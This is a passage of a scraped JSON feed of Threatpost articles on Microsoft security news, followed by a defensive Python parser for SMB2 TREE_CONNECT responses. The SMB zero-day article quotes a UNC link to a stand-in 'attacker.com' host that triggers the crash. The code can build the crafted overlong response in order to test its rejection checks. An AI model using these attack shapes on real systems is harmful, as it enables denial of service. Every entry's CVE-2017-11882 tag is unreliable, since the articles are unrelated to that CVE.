\u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "modified": "2013-08-14T20:51:00", "published": "2013-08-14T16:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. 
With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged and analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a set of enhancements to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. 
\u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "modified": "2014-02-25T21:37:11", "published": "2014-02-25T16:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:35", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "**Update:** Microsoft today has reversed course on its decision to suspend security email notifications, and will resume doing so on Thursday.\n\nThe original decision, made in response to Canada\u2019s antispam law set to go into effect tomorrow, was announced on Friday. 
This afternoon, however, a Microsoft spokesman said the email notifications will begin again with this week\u2019s advanced notification of the July Patch Tuesday security advisories.\n\n\u201cWe have reviewed our processes and will resume these security notifications with our monthly Advanced Notification Service (ANS) on July 3, 2014,\u201d the company\u2019s statement said.\n\nThe move baffled many in the security community, who came to expect the monthly emails, which provide information on what applications will be patched on the next Patch Tuesday. Microsoft has used this as a main communications channel for keeping its enterprise customers apprised of what\u2019s going on in terms of security for the better part of a decade now. After the company began releasing its security patches on a regular monthly schedule, it started sending emails to customers a few days beforehand to let them know how many and what kinds of patches to expect.\n\nMicrosoft also sends out regular messages about new security advisories or when new information is added to a bulletin, such as when active attacks against a given flaw are seen or when a workaround is developed. 
Microsoft posted last week to the Full Disclosure security mailing list that the move was in response to an unspecified change in government regulation.\n\n\u201cAs of July 1, 2014, due to changing governmental policies concerning the issuance of automated electronic messaging, Microsoft is suspending the use of email notifications that announce the following:\n\n * Security bulletin advance notifications\n * Security bulletin summaries\n * New security advisories and bulletins\n * Major and minor revisions to security advisories and bulletins\n\nMicrosoft recommended customers subscribe to one or more of its RSS feeds described on the Security TechCenter website.\n\nSeveral sources indicated that the change is related to a new anti-spam law going into effect in Canada.\n\nIn addition to its email notifications, Microsoft posts all of its new bulletins, advance Patch Tuesday notifications and other security information on a number of channels, including various company blogs, Twitter and elsewhere.\n\n_This story was updated at 6:30 p.m. ET._\n", "modified": "2014-07-01T14:30:49", "published": "2014-06-30T13:37:05", "id": "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "href": "https://threatpost.com/microsoft-to-end-email-security-notifications/106916/", "type": "threatpost", "title": "Microsoft to End Email Security Notifications", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/>)Microsoft dismissed recently-disclosed threats to its BitLocker \ndisk-encryption technology as \u201crelatively low risk,\u201d noting that \nattackers must not only have physical access to a targeted PC, but must \nmanipulate the machine two separate times. 
[Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). [Computerworld] \n", "modified": "2018-08-15T13:57:07", "published": "2009-12-08T20:24:42", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/microsoft-give-security-guidelines-agile-110909/>)Microsoft will release on Tuesday guidelines for developers building online applications and for those using the Agile code-development process. The Agile guidelines apply principles from Microsoft\u2019s Security Development Lifecycle (SDL) to Agile, an umbrella term for a development model frequently used for Web-based applications released under short deadlines, called \u201csprints.\u201d [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). 
[Computerworld]\n", "modified": "2018-08-15T14:14:29", "published": "2009-11-09T18:26:11", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "**UPDATE**\u2013As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren\u2019t enough for organizations to deal with, HP\u2019s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.\n\nThe four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones. Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI\u2019s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.\n\n\u201cWe\u2019re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. We continue to monitor the situation and will take appropriate steps to protect our customers,\u201d a Microsoft spokesperson said.\n\nEach of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. 
The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.\n\nThe most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.\n\n\u201cThe vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document\u2019s elements an attacker can force Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.\n\nThat vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.\n\nAmong the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.\n\n\u201cThe specific flaw exists within the handling of CAttrArray objects. By manipulating a document\u2019s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says. \n\nThe other two vulnerabilities are similar, in that they involve IE mishandling certain objects. IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse. \n\n_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft. _\n\n_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>). 
_\n", "modified": "2015-07-28T14:23:41", "published": "2015-07-23T09:14:36", "id": "THREATPOST:59C4483705849ADA19D341EFA462DD19", "href": "https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/", "type": "threatpost", "title": "Four Zero Days Disclosed in Internet Explorer", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. 
Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). 
But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "modified": "2014-09-25T18:08:18", "published": "2014-09-23T08:53:50", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:09", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine. The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.\n\nIn a message on Twitter, a [researcher named w3bd3vil](<https://twitter.com/#%21/w3bd3vil/status/148454992989261824>) said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. The exploit gives the attacker the ability to run arbitrary code on the victim\u2019s machine.\n\n\u201cA vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user\u2019s system. 
The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large \u201cheight\u201d attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,\u201d the [Secunia advisory](<https://secunia.com/advisories/47237/>) said.\n\nMicrosoft officials have not confirmed the vulnerability, but said that they\u2019re looking into it.\n\n\u201cWe are currently examining the issue and will take appropriate action to help ensure the customers are protected,\u201d Jerry Bryant, group manager of response communications in Microsoft\u2019s Trustworthy Computing Group, said.\n\nThe only known attack vector for this vulnerability right now is the Safari browser running on Windows 7, which is not the most common combination. Depending upon which metrics one uses, Safari has somewhere in the neighborhood of nine to 11 percent market share. 
It\u2019s not clear how many of those Safari users are running Windows, but it\u2019s likely that the vast majority of them are running Mac OS X.\n\nHowever, it\u2019s possible that it may turn out that other browsers could be used as attack vectors for this vulnerability as more information becomes available.\n", "modified": "2013-04-17T16:33:07", "published": "2011-12-20T16:01:26", "id": "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "href": "https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/76016/", "type": "threatpost", "title": "Researchers Warn of New Windows 7 Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. 
Microsoft considers the vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in an email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\[attacker.com](<http://attacker.com/>)\\file.jpg in an email),\u201d Gaffie said. \u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. 
\u201cThis means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in anyways for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address\\IPC$ would trigger the exploit,\u201d Ullrich said. 
\u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. The exploit comes without instructions.\u201d\n\nUllrich explained that the attacker will respond with a crafted Tree Connect Response\u2014Tree Connect Requests are sent to Windows Servers when users connect to shares\u2014that is lengthy and also includes a \u201clong trailer.\u201d He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and a SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.\n\n\u201cThis is where the message should end. 
But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all \u2018C\u2019s\u2019 in the exploit), which then triggers the buffer overflow,\u201d Ullrich said.\n", "modified": "2017-02-03T19:56:30", "published": "2017-02-03T08:36:13", "id": "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "href": "https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/", "type": "threatpost", "title": "Microsoft Waits for Patch Tuesday to Fix SMB Zero Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:54", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft today provided its [Patch Tuesday advanced notification](<https://technet.microsoft.com/en-us/library/security/MS14-NOV>), giving IT managers a heads-up about 16 bulletins that are scheduled to be delivered next week, including five rated critical for remote code execution and privilege escalation issues.\n\nThe heavy patch load is an anomaly for 2014, which has been relatively quiet. The last time Microsoft released anything approaching this many bulletins in one month was in September 2013.\n\n\u201cNext week will tell us how many CVEs are involved but suffice to say, this patch load will be a big impact to the enterprise,\u201d said Russ Ernst, director at Lumension.\n\nExpect another cumulative critical patch rollup for Internet Explorer and four other critical bulletins for Windows. Nine of the remaining bulletins are rated Important by Microsoft and two others Moderate.\n\nOffice software is in the crosshairs of the moderate bulletins. Microsoft said bulletins are on the way for Office 2007 SP3, Microsoft Word Viewer and Office Compatibility Pack SP 3.\n\nMicrosoft is also expected to patch vulnerabilities in Exchange Server 2007, 2010 and 2013, as well as the .NET development framework. 
None of those are rated critical, likely meaning an attacker would require local access in order to exploit the security issues.\n", "modified": "2014-11-06T19:34:02", "published": "2014-11-06T14:34:02", "id": "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "href": "https://threatpost.com/microsoft-ready-with-16-patch-tuesday-bulletins-5-critical/109223/", "type": "threatpost", "title": "November 2014 Microsoft Patch Tuesday Security Bulletins", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
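The Tree Connect Response described in the SMB zero-day article above (a NetBIOS length field claiming 1580 bytes while the fixed SMB2 TREE_CONNECT response ends long before that, with the remainder padded with 'C') is a length-consistency bug: the decoder trusts the outer length and keeps walking into bytes the fixed structure never accounted for. The defensive side is a parser that refuses to decode anything the declared and fixed lengths do not support. The Python below is an added example written for this page; it is not Gaffie's proof-of-concept, Ullrich's test code or anything published by Threatpost. Field layouts follow MS-SMB2 (a 64-byte SMB2 header and a TREE_CONNECT response body whose StructureSize is 16); the share type, access mask, tree and session IDs are placeholder values, and the builder can emit both a well-formed message and the crafted shapes so each check can be seen firing.

```python
"""Length-checked decode of an SMB2 TREE_CONNECT Response (direct TCP, port 445).

Added example, not taken from Threatpost, Gaffie's PoC or SANS ISC. Layouts
follow MS-SMB2; the 1580-byte declared length and the 'C' padding mirror the
crafted response the article describes. IDs and access mask are placeholders.
"""
import struct

NBSS_HEADER_LEN = 4            # 1-byte message type + 3-byte big-endian length
SMB2_HEADER_LEN = 64           # MS-SMB2 2.2.1: fixed 64-byte header
SMB2_PROTOCOL_ID = b"\xfeSMB"
SMB2_TREE_CONNECT = 0x0003     # Command field value for TREE_CONNECT
TREE_CONNECT_RESP_LEN = 16     # MS-SMB2 2.2.10: StructureSize MUST be 16
FLAG_SERVER_TO_REDIR = 0x00000001
HEADER_FMT = "<4sHHIHHIIQIIQ16s"   # ProtocolId .. Signature, 64 bytes total
BODY_FMT = "<HBBIII"               # StructureSize, ShareType, Reserved, ShareFlags, Capabilities, MaximalAccess


def build_tree_connect_response(trailer=b"", declared_length=None):
    """Return [NBSS][SMB2 header][TREE_CONNECT body][trailer] as a server would send it.

    `trailer` appends bytes after the fixed body; `declared_length` overrides the
    NBSS length field so it can disagree with the bytes that actually follow.
    """
    header = struct.pack(HEADER_FMT, SMB2_PROTOCOL_ID, SMB2_HEADER_LEN, 0, 0,
                         SMB2_TREE_CONNECT, 1, FLAG_SERVER_TO_REDIR, 0,
                         1, 0, 1, 0x1000, b"\x00" * 16)
    # ShareType 0x01 = DISK; placeholder MaximalAccess (full access mask).
    body = struct.pack(BODY_FMT, TREE_CONNECT_RESP_LEN, 0x01, 0, 0, 0, 0x001F01FF)
    payload = header + body + trailer
    if declared_length is None:
        declared_length = len(payload)
    return b"\x00" + declared_length.to_bytes(3, "big") + payload


def parse_tree_connect_response(data):
    """Decode a TREE_CONNECT response; raise ValueError rather than read past the fixed body."""
    if len(data) < NBSS_HEADER_LEN or data[0] != 0x00:
        raise ValueError("missing or non-session NBSS header")
    declared = int.from_bytes(data[1:4], "big")
    payload = data[NBSS_HEADER_LEN:]
    # Check 1: the length the peer declares must equal what actually arrived.
    if declared != len(payload):
        raise ValueError(f"NBSS length {declared} != {len(payload)} bytes received")
    if len(payload) < SMB2_HEADER_LEN:
        raise ValueError("truncated SMB2 header")
    (proto, hdr_size, _cc, _status, command, _credits, flags, next_cmd,
     _msg_id, _reserved, tree_id, _session_id, _sig) = struct.unpack(
        HEADER_FMT, payload[:SMB2_HEADER_LEN])
    if proto != SMB2_PROTOCOL_ID or hdr_size != SMB2_HEADER_LEN:
        raise ValueError("bad SMB2 header")
    if command != SMB2_TREE_CONNECT or not flags & FLAG_SERVER_TO_REDIR:
        raise ValueError(f"not a TREE_CONNECT response (command 0x{command:04x})")
    if next_cmd != 0:
        raise ValueError("compound responses not handled here")
    body = payload[SMB2_HEADER_LEN:]
    if len(body) < TREE_CONNECT_RESP_LEN:
        raise ValueError("truncated TREE_CONNECT body")
    struct_size, share_type, _r, share_flags, caps, max_access = struct.unpack(
        BODY_FMT, body[:TREE_CONNECT_RESP_LEN])
    if struct_size != TREE_CONNECT_RESP_LEN:
        raise ValueError(f"StructureSize {struct_size} != {TREE_CONNECT_RESP_LEN}")
    # Check 2: this response has no variable-length part. Anything after the
    # 16-byte body is exactly the padding a crafted message carries, so stop
    # here instead of decoding it.
    extra = len(body) - TREE_CONNECT_RESP_LEN
    if extra:
        raise ValueError(f"{extra} trailing bytes after fixed TREE_CONNECT body")
    return {"tree_id": tree_id, "share_type": share_type, "share_flags": share_flags,
            "capabilities": caps, "maximal_access": max_access}


def rejection_reason(data):
    """Return the parser's complaint for `data`, or None if it decodes cleanly."""
    try:
        parse_tree_connect_response(data)
    except ValueError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    good = build_tree_connect_response()
    print("well-formed:", parse_tree_connect_response(good))
    # Crafted shape: 64 + 16 + 1500 bytes of 'C' = 1580, exactly what the NBSS header claims.
    padded = build_tree_connect_response(trailer=b"C" * 1500)
    print("padded:", rejection_reason(padded))
    # Declared 1580 but only the 80 real bytes sent: caught before any field is decoded.
    lying = build_tree_connect_response(declared_length=1580)
    print("short:", rejection_reason(lying))
```

Running it prints the decoded fields for the well-formed message and the rejection reason for each crafted one. The check that matters is the last one: a TREE_CONNECT response has no variable-length part, so once the 16-byte body has been consumed there is nothing left to decode, and the parser stops regardless of what the NetBIOS header promised.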